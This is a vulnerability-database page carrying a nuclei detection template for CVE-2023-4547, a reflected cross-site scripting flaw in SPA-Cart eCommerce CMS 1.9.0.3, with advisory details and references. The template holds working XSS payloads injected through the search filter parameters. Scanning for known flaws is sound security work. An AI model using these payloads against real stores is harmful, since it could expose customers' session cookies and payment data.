Lucene search
K

SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

SPA-Cart eCommerce CMS 1.9.0.3 vulnerability allows remote Cross-Site Scripting (XSS) attacks via /search functionalit

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
SPA-Cart eCommerce CMS 1.9.0.3 Cross Site Scripting Vulnerability
29 Aug 202300:00
zdt
Circl
CVE-2023-4547
26 Aug 202312:14
circl
CNNVD
SPA-Cart eCommerce CMS 跨站脚本漏洞
26 Aug 202300:00
cnnvd
CVE
CVE-2023-4547
26 Aug 202309:00
cve
Cvelist
CVE-2023-4547 SPA-Cart eCommerce CMS search cross site scripting
26 Aug 202309:00
cvelist
Exploit DB
SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS
4 Sep 202300:00
exploitdb
NVD
CVE-2023-4547
26 Aug 202309:15
nvd
Packet Storm
SPA-Cart eCommerce CMS 1.9.0.3 Cross Site Scripting
28 Aug 202300:00
packetstorm
Prion
Cross site scripting
26 Aug 202309:15
prion
Positive Technologies
PT-2023-29560 · Unknown · Spa-Cart Ecommerce Cms
26 Aug 202300:00
ptsecurity
Rows per page
id: CVE-2023-4547

info:
  name: SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting
  author: theamanrawat,SoSpiRo
  severity: medium
  description: |
    A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through search filter parameters, potentially stealing customer session cookies and payment information from the eCommerce platform.
  remediation: |
    Update SPA-Cart eCommerce CMS to a version newer than 1.9.0.3 that properly sanitizes filter parameters in the search functionality.
  reference:
    - https://spa-cart.com
    - https://cxsecurity.com/ascii/WLB-2023080090
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4547
    - https://vuldb.com/?ctiid.238058
    - https://vuldb.com/?id.238058
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4547
    cwe-id: CWE-79
    epss-score: 0.09932
    epss-percentile: 0.9316
    cpe: cpe:2.3:a:spa-cart:ecommerce_cms:1.9.0.3:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: spa-cart
    product: ecommerce_cms
  tags: cve,cve2023,spa-cart,unauth,xss,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB'
      - '{{BaseURL}}/search?filter[brandid]=vnxjb"><script>alert(document.cookie)</script>bvu51'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '100-1331"><script>alert(document.cookie)</script>'
          - '><script>alert(document.cookie)</script>bvu51'
        condition: or

      - type: word
        part: body
        words:
          - '<table class="products-nav">'

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bfb6d56ed463510df0bafde0ab2d38a46969efdcc045dfaf12be71679a5c2e4602210087a823398634d96f6cf38c8011aa259a148c1f2c748bee11b66c6c2c137dc678:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
3.9Low risk
Vulners AI Score3.9
CVSS 3.13.5 - 6.1
CVSS 24
CVSS 33.5
EPSS0.09932
17